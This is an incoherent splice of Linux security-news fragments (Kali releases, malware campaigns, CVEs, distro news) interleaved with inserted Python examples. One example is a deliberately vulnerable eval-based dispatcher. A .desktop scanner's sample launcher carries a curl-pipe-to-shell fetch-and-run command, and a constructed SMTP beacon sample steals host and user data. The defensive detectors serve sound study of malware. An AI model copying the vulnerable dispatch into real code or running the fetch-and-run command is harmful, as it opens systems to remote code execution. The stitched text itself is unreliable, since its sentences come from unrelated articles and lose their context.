This time, we're getting three new additions:

- bpf-linker - Simple BPF static linker
- evil-winrm-py - Python-based tool for executing commands on remote Windows machines using WinRM
- hexstrike-ai - MCP server that lets AI agents autonomously run tools

Desktop environment updates: Kali Linux 2025.4 brings many new updates to its desktop environments, including GNOME 49, KDE Plasma, and Xfce.
To that end, messaging apps like WhatsApp, Telegram, Snapchat, Arattai, Sharechat, Josh, JioChat, and Signal that use an Indian mobile number to uniquely identify their users (a telecommunication identifier user entity, or TIUE) are required to comply with the directive within 90 days.
Within a network, Akira members have been observed using utilities such as nltest, AnyDesk, LogMeIn, Impacket's wmiexec.py, and VB scripts to perform reconnaissance, spread laterally to other systems, and establish persistence.
This occurs because the tool uses "call_user_func_array" without validating the function names, allowing execution of dangerous PHP functions such as system, exec, shell_exec, passthru, eval, and more.
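The bug class above is unvalidated dynamic dispatch: a caller-supplied string is resolved to a function and called with caller-supplied arguments. The following is an added example (not code from the advisory or the affected tool) that shows the same mistake in Python, where eval() on a dotted name plays the role of call_user_func_array() on an attacker-chosen name, next to the allow-listed form that fixes it. The length/upper helpers are hypothetical application functions.

```python
"""Unvalidated dynamic dispatch beside an allow-listed dispatcher.
Added example; 'length' and 'upper' stand in for real application functions."""
import os  # imported only to show that os.* becomes reachable through eval()


def length(s: str) -> int:
    return len(s)


def upper(s: str) -> str:
    return s.upper()


def resolve_unchecked(func_name: str):
    """Resolve a callable from a caller-controlled string with no validation.
    eval() on a dotted name reaches any imported module, so 'os.system',
    'subprocess.call' or '__import__("os").system' all resolve."""
    return eval(func_name)  # deliberately unsafe: this is the bug


def vulnerable_dispatch(func_name: str, args: list):
    # VULNERABLE: the caller picks both the function and its arguments,
    # which is what calling call_user_func_array($name, $args) unchecked does.
    return resolve_unchecked(func_name)(*args)


# HARDENED: an explicit allow-list mapping public names to specific callables.
# The caller never supplies an identifier, only a key into this table.
ALLOWED_FUNCTIONS = {
    "length": length,
    "upper": upper,
}


def is_allowed(func_name: str) -> bool:
    return func_name in ALLOWED_FUNCTIONS


def hardened_dispatch(func_name: str, args: list):
    if not is_allowed(func_name):
        raise PermissionError(f"function not permitted: {func_name!r}")
    return ALLOWED_FUNCTIONS[func_name](*args)


def safe_call(func_name: str, args: list):
    """Return (ok, result) so callers can branch without catching exceptions."""
    try:
        return True, hardened_dispatch(func_name, args)
    except PermissionError:
        return False, None


if __name__ == "__main__":
    # An attacker-chosen name reaches the OS through the vulnerable path ...
    print(vulnerable_dispatch("os.getcwd", []))
    # ... and is rejected by the allow-listed path.
    print(safe_call("os.getcwd", []))
    print(safe_call("upper", ["hello"]))
```

The fix is the lookup table, not input filtering: a deny-list of "dangerous" names (system, exec, ...) is what such tools usually reach for, and it misses aliases like `__import__("os").system` or any function added later.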
"It's currently not known how this vulnerability is being exploited and by whom, but it's assessed to be used as part of a post-exploitation activity to escalate their privileges after obtaining initial access through some other means, such as social engineering, phishing, or exploitation of another vulnerability," Satnam Narang, senior staff research engineer at Tenable, said.
Besides using Resocks, Rsockstun, Ligolo-ng, CCProxy, Stunnel, and SSH-based methods for proxy and tunneling, Curly COMrades has employed various other tools, including a PowerShell script designed for remote command execution and CurlyShell, a previously undocumented ELF binary deployed in the virtual machine that provides a persistent reverse shell.
[Figure: CurlCat (left) and CurlyShell (right). Source: Bitdefender]

By keeping the malware and its execution inside a virtual machine (VM), the hackers were able to bypass traditional host-based EDR detections, which lacked the network inspection capabilities that could have detected the threat actor's command and control (C2) traffic from the VM.
To lure users, the threat actor used typosquatting, a tactic that leverages misspellings or variations of the legitimate names for TypeScript (typed superset of JavaScript), discord.js (Discord bot library), ethers.js (Ethereum JS library), nodemon (auto-restarts Node apps), react-router-dom (React browser router), and zustand (minimal React state manager).
"System keyrings store credentials for critical services including email clients (Outlook, Thunderbird), cloud storage sync tools (Dropbox, Google Drive, OneDrive), VPN connections (Cisco AnyConnect, OpenVPN), password managers, SSH passphrases, database connection strings, and other applications that integrate with the OS credential store," Socket said.

The official website for Xubuntu, a community-maintained "flavour" of Ubuntu that ships with the Xfce desktop environment, has been compromised to serve Windows malware instead of the Linux distro.

The malicious download
Reports about a potential compromise began popping up on Reddit on Sunday, with users saying that instead of pointing to .torrent files, the download page served Xubuntu-Safe-Download.zip, containing a suspicious executable (TestCompany.SafeDownloader.exe) and a text file (tos.txt). "The TOS starts with Copyright (c) … More
The post Official Xubuntu website compromised to serve malware appeared first on Help Net Security.
The overall sequence of events unfolds as follows:

1. Install the "Hide" eBPF module, which contains eBPF programs of the Tracepoint and Kretprobe types to hide its processes and network activity.
2. If the "Hide" module installation fails, or if it has been disabled, install the shared library "libld.so" via /etc/ld.so.preload.
3. If reverse mode is used, install the "Knock" eBPF module, which contains two eBPF programs of the eXpress Data Path (XDP) and Traffic Control (TC) types, so that the C2 communication channel is opened only upon receipt of the magic packet.
4. Achieve persistence by setting up a systemd service.
5. Execute C2 commands.
6. On interruption (SIGHUP, SIGINT, and SIGTERM signals), uninstall the eBPF modules, delete the modified /etc/ld.so.preload, and restore it to its original version.

To achieve this, LinkPro modifies the "/etc/ld.so.preload" configuration file to specify the path of the libld.so shared library embedded within it, with the main objective of concealing various artifacts that could reveal the backdoor's presence.
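Both hiding mechanisms in the sequence above leave a host-side artifact: an entry in /etc/ld.so.preload, and loaded eBPF programs of the types the two modules use. The following is an added example, not code from the LinkPro write-up, of an audit that checks both. It assumes the JSON layout emitted by `bpftool -j prog show` (the `pids` array is only present when bpftool was built with that support; programs without loader information are flagged rather than skipped), and the sample preload file and program list are constructed, with illustrative names rather than real LinkPro identifiers.

```python
"""Audit for ld.so.preload entries and eBPF programs of the types LinkPro uses.
Added example with constructed sample data; run audit_live() as root for a real host."""
import json
import os

# Program types named in the write-up: kprobe (the type also used for kretprobe)
# and tracepoint for the Hide module, xdp and sched_cls (TC) for the Knock module.
HIDING_TYPES = {"kprobe", "tracepoint"}
NETWORK_TYPES = {"xdp", "sched_cls"}


def audit_preload(preload_text: str) -> list[str]:
    """Return every library listed in ld.so.preload (whitespace separated,
    '#' comments ignored). On most hosts the file is absent or empty."""
    entries = []
    for line in preload_text.splitlines():
        line = line.split("#", 1)[0]
        entries.extend(line.split())
    return entries


def audit_bpf_progs(bpftool_json: str, baseline_comms: set[str]) -> list[dict]:
    """Return programs of the types above not loaded by a baseline process name
    (your EDR agent, systemd, ...). Programs with no pid info are flagged."""
    flagged = []
    for prog in json.loads(bpftool_json):
        ptype = prog.get("type", "")
        if ptype not in HIDING_TYPES | NETWORK_TYPES:
            continue
        loaders = {p.get("comm", "") for p in prog.get("pids", [])}
        if loaders and loaders <= baseline_comms:
            continue
        flagged.append({"id": prog.get("id"), "type": ptype,
                        "name": prog.get("name", ""), "loaders": sorted(loaders)})
    return flagged


def matches_knock_hide_pattern(flagged: list[dict]) -> bool:
    """Knock (XDP/TC) plus Hide (kprobe/tracepoint), both outside the baseline,
    is the combination the write-up describes."""
    types = {f["type"] for f in flagged}
    return bool(types & NETWORK_TYPES) and bool(types & HIDING_TYPES)


def audit_live(baseline_comms: set[str]) -> dict:
    """Run against the real host; bpftool needs root."""
    import subprocess
    preload = ""
    if os.path.exists("/etc/ld.so.preload"):
        with open("/etc/ld.so.preload") as fh:
            preload = fh.read()
    out = subprocess.run(["bpftool", "-j", "prog", "show"],
                         capture_output=True, text=True, check=True).stdout
    flagged = audit_bpf_progs(out, baseline_comms)
    return {"preload": audit_preload(preload), "bpf": flagged,
            "knock_hide": matches_knock_hide_pattern(flagged)}


# Constructed sample: one legitimate systemd program plus three laid out like
# the Knock and Hide modules. Names and comm values are illustrative only.
SAMPLE_PRELOAD = "/lib/libld.so\n"
SAMPLE_BPFTOOL = json.dumps([
    {"id": 3, "type": "cgroup_skb", "name": "sd_fw_egress", "pids": [{"pid": 1, "comm": "systemd"}]},
    {"id": 41, "type": "kprobe", "name": "hide_getdents", "pids": [{"pid": 4242, "comm": "x_linkpro"}]},
    {"id": 42, "type": "xdp", "name": "knock_xdp", "pids": [{"pid": 4242, "comm": "x_linkpro"}]},
    {"id": 43, "type": "sched_cls", "name": "knock_tc", "pids": [{"pid": 4242, "comm": "x_linkpro"}]},
])


def audit_sample() -> dict:
    flagged = audit_bpf_progs(SAMPLE_BPFTOOL, {"systemd"})
    return {"preload": audit_preload(SAMPLE_PRELOAD), "bpf": flagged,
            "knock_hide": matches_knock_hide_pattern(flagged)}


if __name__ == "__main__":
    print(json.dumps(audit_sample(), indent=2))
```

Run the live audit from a trusted environment (a rescue boot or a known-good static bpftool): a Hide module that hooks getdents-style tracepoints can also filter what bpftool and `cat /etc/ld.so.preload` see from the compromised host.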
(Disclosed as exploited by Cisco last week.)

CVE-2025-10035 - Fortra GoAnywhere MFT contains a deserialization of untrusted data vulnerability that allows an actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection.

OffSec has released Kali Linux 2025.3, the most up-to-date version of its popular penetration testing and digital forensics platform. What's new in Kali Linux 2025.3: better virtual machine tooling. The way Kali builds and ships its VM images has been updated, with improved scripts and workflows that are more consistent and easier to manage. Nexmon Wi-Fi support: Nexmon is a firmware patch that allows users to enable monitor mode (packet sniffing) and packet … More
The post Kali Linux 2025.3 brings improved virtual machine tooling, 10 new tools appeared first on Help Net Security.
With this release, we have ten new tools, which are listed below:

- Caido - The client side of Caido (the graphical/desktop aka the main interface), a web security auditing toolkit
- Caido-cli - The server section of Caido, a web security auditing toolkit
- Detect It Easy (DiE) - File type identification
- Gemini CLI - An open-source AI agent that brings the power of Gemini directly into your terminal
- krbrelayx - Kerberos relaying and unconstrained delegation abuse toolkit
- ligolo-mp - Multiplayer pivoting solution
- llm-tools-nmap - Enables LLMs to perform network discovery and security scanning tasks using nmap
- mcp-kali-server - MCP configuration to connect an AI agent to Kali
- patchleaks - Spots the security fix and provides a detailed description so you can validate, or weaponize, it fast
- vwifi-dkms - Set up "dummy" Wi-Fi networks, establish connections, and disconnect from them

Kali NetHunter and Nexmon updates: Nexmon is a firmware patching framework for Broadcom and Cypress Wi-Fi chips that allows you to enable monitor mode and frame injection.
Compiled with Go, the Linux version supports a wide range of functions to enable file exfiltration, system enumeration, screenshot capture, persistence through systemd services, and arbitrary command execution:

- /fs_list, to enumerate directories
- /fs_get, to exfiltrate files from the host
- /metrics, to perform system profiling
- /proc_list, to run the "ps" Linux command
- /proc_kill, to kill a specific process by passing the PID as input
- /capture_display, to take screenshots
- /persist, to establish persistence

ZynorRAT's Windows version is near-identical to its Linux counterpart, while still resorting to Linux-based persistence mechanisms.

Kopia is an open-source backup and restore tool that lets you create encrypted snapshots of your files and store them in cloud storage, on a remote server, on network-attached storage, or on your own computer. It doesn't create a full image of your machine. Instead, you pick the files and folders you want to back up or restore.

[Figure: Kopia using Google Cloud Storage with pluggable encryption and compression]

Kopia comes with both a command-line interface … More
The post Kopia: Open-source encrypted backup tool for Windows, macOS, Linux appeared first on Help Net Security.
[Figure: Sample of a decoy PDF used in the attacks. Source: CloudSEK]

In addition to the manipulation of the "Exec=" field to run a sequence of shell commands, the attackers also added fields like "Terminal=false" to hide the terminal window from the user, and "X-GNOME-Autostart-enabled=true" to run the file at every login.
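The three fields named above are all visible in the .desktop file itself, so a scanner can score a launcher without executing it. The following is an added example, not CloudSEK's code, that parses a .desktop entry with the standard library and reports a shell-wrapped or downloading Exec=, Terminal=false on such an Exec=, the autostart flag outside an autostart directory, and an Application whose Name= imitates a document. The two sample entries are constructed; the 203.0.113.10 address is a documentation address, not a real indicator.

```python
"""Heuristic scanner for abused .desktop launchers. Added example; samples are constructed."""
import configparser
import glob
import os
import re

# Patterns that do not belong in the Exec= of something posing as a document.
SUSPICIOUS_EXEC = [
    (r"\b(sh|bash|dash|zsh)\s+-c\b", "shell -c wrapper"),
    (r"\b(curl|wget)\b", "downloader in Exec"),
    (r"\bbase64\b", "base64 decoding"),
    (r"[|;&]", "command chaining"),
    (r"\bnohup\b|\bsetsid\b", "detached execution"),
]
DOCUMENT_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.I)


def parse_desktop(text: str) -> dict:
    """Return the [Desktop Entry] group as a dict, keeping key case."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str
    cp.read_string(text)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}


def scan_desktop(text: str, location: str = "") -> list[str]:
    """Return a list of findings; an empty list means nothing looked wrong."""
    entry = parse_desktop(text)
    if not entry:
        return ["not a Desktop Entry"]
    findings = []
    exec_line = entry.get("Exec", "")
    for pattern, why in SUSPICIOUS_EXEC:
        if re.search(pattern, exec_line):
            findings.append(f"Exec: {why}")
    if findings and entry.get("Terminal", "").lower() == "false":
        findings.append("Terminal=false hides the shell window")
    if entry.get("X-GNOME-Autostart-enabled", "").lower() == "true" and "autostart" not in location:
        findings.append("X-GNOME-Autostart-enabled=true outside an autostart directory")
    if entry.get("Type") == "Application" and DOCUMENT_NAME.search(entry.get("Name", "")):
        findings.append("Application whose Name imitates a document file")
    return findings


def scan_autostart_dirs() -> dict[str, list[str]]:
    """Scan the user's and the system's autostart directories on a live host."""
    paths = glob.glob(os.path.expanduser("~/.config/autostart/*.desktop"))
    paths += glob.glob("/etc/xdg/autostart/*.desktop")
    results = {}
    for path in paths:
        with open(path, errors="replace") as fh:
            findings = scan_desktop(fh.read(), path)
        if findings:
            results[path] = findings
    return results


# Constructed samples: a launcher built like the ones described, and a normal one.
MALICIOUS = """[Desktop Entry]
Type=Application
Name=Invitation.pdf
Exec=sh -c "curl -s http://203.0.113.10/p.sh | sh; xdg-open /tmp/decoy.pdf"
Terminal=false
X-GNOME-Autostart-enabled=true
"""
BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Terminal=false
"""

if __name__ == "__main__":
    print(scan_desktop(MALICIOUS, "/home/user/Downloads/Invitation.pdf.desktop"))
    print(scan_desktop(BENIGN, "/usr/share/applications/gedit.desktop"))
    print(scan_autostart_dirs())
```

Terminal=false alone is normal for GUI applications, which is why it only counts when the Exec= already looks like a shell pipeline; the autostart flag is likewise ordinary inside ~/.config/autostart and only suspicious on a file delivered elsewhere, so the location is part of the input.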
The backdoor was stealthily injected by a long-time project contributor named "Jia Tan," and shipped in official Linux distro packages like Debian, Fedora, openSUSE, and Red Hat, making it one of the most severe software supply chain compromises last year.
This is added on top of what Unit 42 documented previously, including privilege-aware execution logic, use of benign filenames, hooking libc functions, use of a fake logs directory, C2 connections over TLS, unique hashes for each sample, and the existence of a "kill switch."
It also performs network hardening and proxy evasion, overwriting /etc/resolv.conf to use Cloudflare and Google DNS, locking it using the chattr +i command, flushing iptables, resetting proxy variables, and using a custom module to brute-force working proxies via curl, wget, and raw TCP checks.
The packages were named "librewolf-fix-bin", "firefox-patch-bin", and "zen-browser-patched-bin," and were uploaded by the same user, "danikpapas," on July 16.

Here's an overview of some of last week's most interesting news, articles, interviews and videos: Stealthy backdoor found hiding in SOHO devices running Linux: SecurityScorecard's STRIKE team has uncovered a network of compromised small office and home office (SOHO) devices they're calling LapDogs. High-risk WinRAR RCE vulnerability patched, update quickly! (CVE-2025-6218): A recently patched directory traversal vulnerability (CVE-2025-6218) in WinRAR could be leveraged by remote attackers to execute arbitrary code on affected installations. Breaking the … More
The post Week in review: Backdoor found in SOHO devices running Linux, high-risk WinRAR RCE flaw patched appeared first on Help Net Security.
Infosec products of the month: June 2025. Here's a look at the most interesting products from the past month, featuring releases from: Akamai, AttackIQ, Barracuda Networks, BigID, Bitdefender, Contrast Security, Cymulate, Dashlane, Embed Security, Fortanix, Fortinet, Jumio, Lemony, Malwarebytes, SpecterOps, StackHawk, Stellar Cyber, Sumsub, Thales, Tines, Vanta, and Varonis.

Users lack control as major AI platforms share personal info with third parties. Some of the most popular generative AI and large language model (LLM) platforms, from companies like Meta, Google, and Microsoft, are collecting sensitive data and sharing it with unknown third parties, leaving users with limited transparency and virtually no control over how their information is stored, used, or shared, according to Incogni.
The Linux Foundation is a nonprofit organization that hosts and supports open-source projects such as Linux, Kubernetes, Node.js, PyTorch, and RISC-V. The organization provides neutral governance, legal, operational, and technical support, and the infrastructure required for collaboration, trust, and longevity.
The Qualys Threat Research Unit (TRU), which discovered and reported both flaws, has developed proof-of-concept exploits and successfully targeted CVE-2025-6019 to get root privileges on Ubuntu, Debian, Fedora, and openSUSE Leap 15 systems.
Kali Linux has long been the go-to operating system for penetration testers and security professionals, and Learning Kali Linux, 2nd Edition by Ric Messier aims to guide readers through its core tools and use cases. This updated edition introduces new material on digital forensics and reverse engineering, while keeping its focus on practical, hands-on learning. It's written for people who have at least some familiarity with Linux or command-line environments, but it doesn't assume deep … More
The post Review: Learning Kali Linux, 2nd Edition appeared first on Help Net Security.
About the author: Ric Messier is an author, consultant, and educator who holds CCSP, GCIH, GSEC, CEH, and CISSP certifications, and has published several books on information security and digital forensics.

Topics include network reconnaissance, vulnerability scanning, exploitation, post-exploitation, wireless testing, and web application assessment.
New tools in Kali Linux 2025.2: this new Kali Linux release also adds 13 new toys to test:

- azurehound - BloodHound data collector for Microsoft Azure
- binwalk3 - Firmware analysis tool
- bloodhound-ce-python - Python-based ingestor for BloodHound CE
- bopscrk - Generate smart and powerful wordlists
- chisel-common-binaries - Prebuilt binaries for chisel
- crlfuzz - Fast tool to scan for CRLF vulnerabilities, written in Go (submitted by @Arszilla)
- donut-shellcode - Generates position-independent shellcode from memory and runs it
- gitxray - Scan GitHub repositories and contributors to collect data (submitted by @weirdlantern)
- ldeep - In-depth LDAP enumeration utility
- ligolo-ng-common-binaries - Prebuilt binaries for ligolo-ng
- rubeus - Raw Kerberos interaction and abuses
- sharphound - BloodHound CE collector
- tinja - CLI tool for testing web pages for template injection

Kali NetHunter updates: besides a revamped car hacking toolset, Kali Linux 2025.2 introduces wireless injection, de-authentication, and WPA2 handshake capture support for the first smartwatch, the TicWatch Pro 3 (all variants with the bcm43436b0 chipset).

OffSec has released Kali Linux 2025.2, the most up-to-date version of the widely used penetration testing and digital forensics platform.

[Figure: KDE Plasma 6.3 in Kali Linux 2025.2. Source: OffSec]

New in Kali Linux 2025.2: as per usual, the newest Kali version comes with new community wallpapers and new versions of the KDE Plasma and GNOME graphical desktop environments. This time around, the Kali Menu is new, as well: it has been reorganized to follow the … More
The post Kali Linux 2025.2 delivers Bloodhound CE, CARsenal, 13 new tools appeared first on Help Net Security.
This week's list includes CVE-2025-20286 (Cisco Identity Services Engine), CVE-2025-49113 (Roundcube), CVE-2025-5419 (Google Chrome), CVE-2025-21479, CVE-2025-21480, CVE-2025-27038 (Qualcomm), CVE-2025-37093 (HPE StoreOnce), CVE-2025-48866 (ModSecurity WAF), CVE-2025-25022 (IBM QRadar Suite), CVE-2025-22243 (VMware NSX Manager), CVE-2025-24364, CVE-2025-24365 (Vaultwarden), and CVE-2024-53298 (Dell PowerScale OneFS).

Also known by the aliases "dendimirror," "alinchok," "ghackihg," "makc1901," "navi_ghacking," and "bloodzz.fenix," Rudometov is believed to have fled from the Luhansk region of Ukraine, where he was born, to Krasnodar, Russia, following the Russian invasion of Ukraine in February 2022.

China Accuses Taiwan of Running 5 APT Groups with U.S. Help — China's National Computer Virus Emergency Response Center (CVERC) has accused Taiwan's Democratic Progressive Party (DPP) of sponsoring five advanced persistent threat (APT) groups to conduct cyber espionage attacks against government and public service entities, research institutions, universities, defense technology and industry entities, and foreign affairs agencies located in mainland China. The groups, overseen by Taiwan's Information, Communications and Electronic Force Command (ICEFOM), include APT-C-01 (aka Poison Vine or GreenSpot), APT-C-62 (aka Viola Tricolor), APT-C-64 (aka Anonymous 64), APT-C-65 (aka Neon Pothos), and APT-C-67 (aka Ursa). "Their primary goal is to steal and sell sensitive intelligence, including important diplomatic policies, defense technology, cutting-edge scientific achievements, and economic data, to anti-China forces abroad," CVERC claimed in a report titled Operation Futile.

According to ReliaQuest, Lumma accounted for nearly 92% of Russian Market credential log alerts in Q4 2024, putting it way ahead of its peers RedLine, StealC, Raccoon, Vidar, RisePro, and a new stealer referred to as Acreed.

"Over the past several months and years, we have observed a pattern of compliance failures, unmet improvement commitments, and the absence of tangible, measurable progress in response to publicly disclosed incident reports," Google said.

"During this period, customer endpoints remained protected, but security teams were unable to access the management console and related services, which significantly impacted their ability to manage their security operations and access important data," it said.

Intel 471, in a report last week, highlighted an increase in Android malware incorporating hidden virtual network computing (HVNC), keylogging, and remote control functionalities, and a decrease in web injects.

Threat hunters have disclosed a new malware campaign that employs cracked software or key generators for legitimate software as lures to distribute a known stealer malware called ViperSoftX, alongside other malware families such as Quasar RAT, PureCrypter, PureHVNC, and a cryptocurrency clipper.
The new platform "brings together a fragmented ecosystem by bringing together plugins from any source" and "builds security into the supply chain, including improved cryptographic security measures, enhanced browser compatibility checking, and enabling reliance on trusted source security salts."
It can gather OS and user info, take screenshots, reboot or shut down the system, lock or sign out users (Windows only), browse and manage files (explore, upload, download, delete), and open URLs in the default browser. Chaos RAT enables attackers to manage files, open reverse shells, and proxy network traffic, which are functions useful for spying, stealing data, or setting the stage for ransomware.
Once installed, the malware connects to an external server and awaits commands that allow it to launch reverse shells, upload/download/delete files, enumerate files and directories, take screenshots, gather system information, lock/restart/shutdown the machine, and open arbitrary URLs.
A race condition in systemd-coredump allows an attacker to force a SUID process to crash and replace it with a non-SUID binary in order to access the original process's privileged core dump, letting the attacker read sensitive data, such as /etc/shadow content, loaded by the original SUID process. SUID, short for Set User ID, is a special file permission that allows a user to execute a program with the privileges of its owner, rather than their own.
The first (CVE-2025-5054) affects Ubuntu's core-dump handler, Apport, and the second (CVE-2025-4598) targets systemd-coredump, which is the default core-dump handler on Red Hat Enterprise Linux 9 and the recently released 10, as well as on Fedora.
Darktrace said its analysis of the campaign uncovered other related binaries that are said to be deployed as part of a broader campaign:

- ddaemon, a Go-based backdoor that retrieves the binary "networkxm" into "/usr/src/bao/networkxm" and executes the shell script "installx.sh"
- networkxm, an SSH brute-force tool that functions like the botnet's initial stage: it fetches a password list from a C2 server and attempts to connect via SSH across a list of target IP addresses
- installx.sh, which retrieves another shell script, "jc.sh," from "1.lusyn[.]xyz," grants it read, write, and execute permissions for all users, runs it, and clears the bash history
- jc.sh, which downloads a malicious "pam_unix.so" file from an external server and uses it to replace the legitimate one installed on the machine, and also retrieves and runs another binary named "1" from the same server
- pam_unix.so, which acts as a rootkit that steals credentials by intercepting successful logins and writing them to the file "/usr/bin/con.txt"
- 1, which monitors for the file "con.txt" being written or moved to "/usr/bin/" and then exfiltrates its contents to the same server

Given that the botnet's SSH brute-force capability lends it worm-like behavior, users are advised to watch for anomalous SSH login activity, particularly failed login attempts, audit systemd services regularly, review authorized_keys files for unknown SSH keys, apply strict firewall rules to limit exposure, and filter HTTP requests with non-standard headers, such as X-API-KEY: jieruidashabi.
New PumaBot targets Linux IoT surveillance devices
Pierluigi Paganini, May 28, 2025
PumaBot targets Linux IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine crypto. "While it does not appear to propagate automatically like a traditional worm, it does maintain worm-like behavior by brute-forcing targets, suggesting a semi-automated botnet campaign focused on device compromise and long-term access."

Microsoft has officially open-sourced the Windows Subsystem for Linux (WSL), closing the very first issue ever filed on the Microsoft/WSL GitHub repository: "Will this be open source?" WSL allows developers to run unmodified Linux command-line tools, utilities, and applications directly on Windows, without the overhead of a traditional virtual machine or dual-boot setup.
The post The Windows Subsystem for Linux goes open source appeared first on Help Net Security.
"While regular users received the bulk of authentication attempts (50,214), admin accounts and shared mailboxes were targeted at a specific pattern, with admin accounts receiving 9,847 attempts across 432 IPs over 8 hours, suggesting an average of 22.79 attempts per IP and a velocity of 1,230.87 attempts per hour," the company said.

Red Hat Enterprise Linux 10 provides a strategic and intelligent backbone for enterprise IT to navigate complexity, accelerate innovation and build a more secure computing foundation for the future. As enterprise IT grapples with the proliferation of hybrid environments and the imperative to integrate AI workloads, the need for an intelligent, resilient and durable operating system has never been greater. Red Hat Enterprise Linux 10 rises to this challenge, delivering a platform engineered for agility, … More
The post Red Hat Enterprise Linux 10 helps mitigate future quantum-based threats appeared first on Help Net Security.
"With intelligent features using gen AI, unified hybrid cloud management through image mode and a proactive approach to security with post-quantum cryptography, Red Hat Enterprise Linux 10 provides the robust and innovative foundation needed to thrive in the era of hybrid cloud and AI," said Gunnar Hellekson, VP and GM, Red Hat Enterprise Linux, Red Hat. Key additions in Red Hat Enterprise Linux 10 include capabilities and innovations to get ready for the hybrid cloud today, with pre-tuned, fully supported and ready-to-run Red Hat Enterprise Linux images across AWS, Google Cloud and Microsoft Azure.
Comparison of oniux and torsocks, as laid out by the Tor Project:

                   oniux                                 torsocks
Deployment         Standalone application                Requires a running Tor daemon
Mechanism          Uses Linux namespaces                 Uses an ld.so preload hack
Coverage           Works on all applications             Only applications making system calls through libc
Leak resistance    Malicious application cannot leak     Can leak by making a system call through raw assembly
Platform           Linux only                            Cross-platform
Maturity           New and experimental                  Battle-proven for over 15 years
Engine             Arti                                  CTor
Language           Written in Rust                       Written in C

Despite the obvious advantages of oniux, Tor highlights that the project is still experimental and hasn't been tested extensively under multiple conditions and scenarios.

The Nobara Project has released a new version of its Linux distribution, bringing updated packages, performance improvements, and a few visual tweaks aimed at making life easier for users who want a system that works well out of the box. Nobara Linux 42 includes changes that will be especially useful for anyone who wants a preconfigured Fedora-based desktop with minimal setup. Nobara is a custom version of Fedora Linux that includes extra drivers, packages, and … More
The post Nobara Linux 42 brings performance boost and better hardware support appeared first on Help Net Security.
For people who want a ready-to-use desktop for gaming, media work, or daily tasks, that can mean a lot of extra setup.
[Figure: Instructions for Linux users. Source: Hunt.io]

The command drops the "mapeal.sh" payload on the target's system, which, according to Hunt.io, does not perform any malicious actions in its current version, being limited to fetching a JPEG image from the attacker's server.
Malicious Go modules designed to wipe Linux systems
Pierluigi Paganini, May 04, 2025
Researchers found 3 malicious Go modules with hidden code that can download payloads to wipe a Linux system's main disk, making it unbootable.
The packages, which have since been removed, are as follows:

- cfc-bsb (2,913 downloads)
- coffin2022 (6,571 downloads)
- coffin-codes-2022 (18,126 downloads)
- coffin-codes-net (6,144 downloads)
- coffin-codes-net2 (6,238 downloads)
- coffin-codes-pro (9,012 downloads)
- coffin-grave (6,544 downloads)

The packages use hard-coded Gmail account credentials to sign in to the service's SMTP server and send a message to another Gmail address to signal a successful compromise.
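The signalling behaviour described above has a static signature: an SMTP connection to a literal host, a login() with two string literals, and an outbound send, all in one module. The following is an added example, not Socket's scanner, that finds that combination in Python source with the standard `ast` module, so it can be pointed at an unpacked sdist or wheel before installation. The sample module it scans is constructed and uses placeholder addresses and an obviously fake password.

```python
"""AST check for hard-coded SMTP beaconing in a Python package. Added example; sample is constructed."""
import ast


def find_hardcoded_smtp(source: str) -> list[dict]:
    """Return findings for SMTP client construction with a literal host,
    login() with literal user and password, and outbound send calls."""
    tree = ast.parse(source)
    imports_smtplib = any(
        (isinstance(n, ast.Import) and any(a.name == "smtplib" for a in n.names))
        or (isinstance(n, ast.ImportFrom) and n.module == "smtplib")
        for n in ast.walk(tree)
    )
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
        literal_args = [a.value for a in node.args
                        if isinstance(a, ast.Constant) and isinstance(a.value, str)]
        if name in ("SMTP", "SMTP_SSL") and literal_args:
            findings.append({"line": node.lineno, "kind": "smtp_host", "value": literal_args[0]})
        elif name == "login" and len(literal_args) >= 2:
            # user and password both literal: the credential is in the package
            findings.append({"line": node.lineno, "kind": "literal_credentials", "value": literal_args[0]})
        elif name in ("sendmail", "send_message") and imports_smtplib:
            findings.append({"line": node.lineno, "kind": "outbound_mail", "value": ""})
    return findings


def is_suspicious(findings: list[dict]) -> bool:
    """A literal SMTP host together with literal credentials is the beacon pattern."""
    kinds = {f["kind"] for f in findings}
    return {"smtp_host", "literal_credentials"} <= kinds


def scan_file(path: str) -> list[dict]:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_hardcoded_smtp(fh.read())


# Constructed module resembling the reported behaviour (placeholder values only).
SAMPLE_SOURCE = '''
import smtplib, socket, getpass

def _notify():
    s = smtplib.SMTP_SSL("smtp.gmail.com", 465)
    s.login("beacon.example@gmail.com", "app-password-placeholder")
    s.sendmail("beacon.example@gmail.com", "sink.example@gmail.com",
               "Subject: infected\\n\\n" + socket.gethostname() + " " + getpass.getuser())
    s.quit()
'''

if __name__ == "__main__":
    found = find_hardcoded_smtp(SAMPLE_SOURCE)
    for f in found:
        print(f)
    print("suspicious:", is_suspicious(found))
```

Credentials assembled at runtime (concatenated, base64-decoded, or read from a bytes blob) are not string constants and slip past the login() check; the literal SMTP host plus an outbound send from a package with no mail-related purpose is still worth a manual look on its own.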
"Today, many security vendors are shifting towards building eBPF-based agents, largely because eBPF is considered 'safe' for use in products like EDR and CWPP," concludes the report.

Peridio, a platform for building and maintaining advanced embedded products, has launched Avocado OS, an open-source embedded Linux distribution made to simplify the way developers build complex embedded systems. Avocado OS focuses on delivering a smooth developer experience while offering security, reliability, and consistent performance. A new answer to an old problem: teams building with traditional embedded Linux often face a tough choice. They must pick between developer-friendly systems that move fast, or production systems … More
The post Avocado OS: Open-source Linux platform for embedded systems appeared first on Help Net Security.
Avocado OS delivers critical capabilities without forcing tradeoffs: immutable and deterministic runtimes, fault-tolerance, modular update mechanisms, simplified secure boot implementation, full disk encryption, and boot modes for manufacturing, recovery, and testing.
To avoid experiencing these update issues, OffSec advises users to manually download and install the new repository signing key using the following command:

sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg

OffSec also provides details on how to check that the checksum of the file matches and how to view the contents of the updated keyring.
[Figure: io_uring task submission and completion rings. Source: Donald Hunter]

